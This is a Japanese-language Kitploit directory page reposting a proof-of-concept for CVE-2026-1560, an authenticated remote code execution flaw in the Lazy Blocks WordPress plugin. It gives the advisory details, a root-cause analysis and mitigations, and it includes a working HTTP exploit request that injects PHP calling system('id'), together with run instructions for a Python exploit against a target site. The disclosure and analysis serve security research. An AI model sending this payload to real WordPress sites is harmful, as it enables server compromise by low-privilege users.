Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — CVE-2026-1560の概念実証エクスプロイト。Lazy Blocks WordPressプラグインにおける認証済みリモートコード実行の脆弱性で、低権限ユーザーがREST APIを介して任意のPHPを実行できるようにします。 | Kitploit
ツール/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

CVE-2026-1560の概念実証エクスプロイト。Lazy Blocks WordPressプラグインにおける認証済みリモートコード実行の脆弱性で、低権限ユーザーがREST APIを介して任意のPHPを実行できるようにします。

リポジトリを見る
26ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1560 – Custom Block Builder – Lazy Blocks ≤ 4.2.0 における認証済みリモートコード実行

研究者: ZeYrOXxx

プラグイン: Custom Block Builder – Lazy Blocks

影響を受けるバージョン: ≤ 4.2.0

深刻度: 高

CVSS: 8.8

脆弱性タイプ: 認証済みリモートコード実行(RCE)

攻撃ベクトル: REST API

必要な権限: edit_posts(Contributor以上)


参考情報

  • Wordfence アドバイザリ: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

概要

Custom Block Builder – Lazy Blocks WordPress プラグインのバージョン 4.2.0 以前に、高深刻度のセキュリティ脆弱性が特定されました。 この脆弱性により、低権限の認証済みユーザー(Contributorロール)が、ブロックプレビュー機能を目的とした REST API エンドポイントを介して、サーバー上で任意の PHP コードを実行できる可能性があります。

この問題は WordPress の権限モデルを完全に破壊し、サーバー全体の侵害につながる可能性があります。


脆弱なエンドポイント

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

このエンドポイントは、edit_posts 権限を持つすべての認証済みユーザーがアクセスできます。


技術的詳細

権限チェック

REST ルートは、脆弱な権限コールバックで登録されています:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

これには Contributor が含まれており、PHP コードの実行を許可されるべきではありません。


脆弱なコードパス

REST コントローラー – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

ブロックレンダラー – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

eval() 関数は、サニタイズや検証なしに攻撃者が制御する PHP コードを実行します。


根本原因分析

Lazy Blocks は、ブロックのカスタム PHP レンダリングロジックを許可しています。 REST API プレビューエンドポイントはユーザー指定のブロック定義を受け入れ、信頼できる保存済みブロックと攻撃者が制御するプレビューブロックを区別しません。

以下のようなフラット化されたブロック属性を注入することで:

  • code_output_method
  • code_editor_html

攻撃者は php_eval() の実行シンクに到達し、任意の PHP コードを実行できます。


概念実証(HTTP)

リクエスト:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

レスポンス:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ 任意のコマンド実行が確認されました


この PoC はセキュリティテストおよび研究目的のみで提供されています。


影響

Contributor アクセス権を持つ攻撃者は以下を実行できます:

  • 任意のシステムコマンドの実行
  • 機密ファイルの読み取り(例: wp-config.php)
  • PHP ソースファイルの変更
  • 管理者への権限昇格
  • WordPress インスタンスの完全な侵害

対策

  • PHP レンダリングを管理者のみに制限する
  • ユーザー制御の入力に対する eval() の使用を排除する
  • PHP コードを含むブロックの REST プレビューを防止する
  • manage_options または unfiltered_html 権限を要求する
  • PHP 実行を安全なテンプレートメカニズムに置き換える

使用方法(Python PoC)

要件

  • Python 3.x
  • requests ライブラリ
  • edit_posts 権限を持つ有効な WordPress 認証情報(Contributor以上)

依存関係のインストール

root@kitploit:~
pip install requests

エクスプロイトの実行

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

例

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

ターゲットが脆弱な場合、コマンドの出力が HTTP レスポンスで返されます。

⚠️ この概念実証は、認可されたセキュリティテストおよび研究目的のみを意図しています。

ツールをダウンロード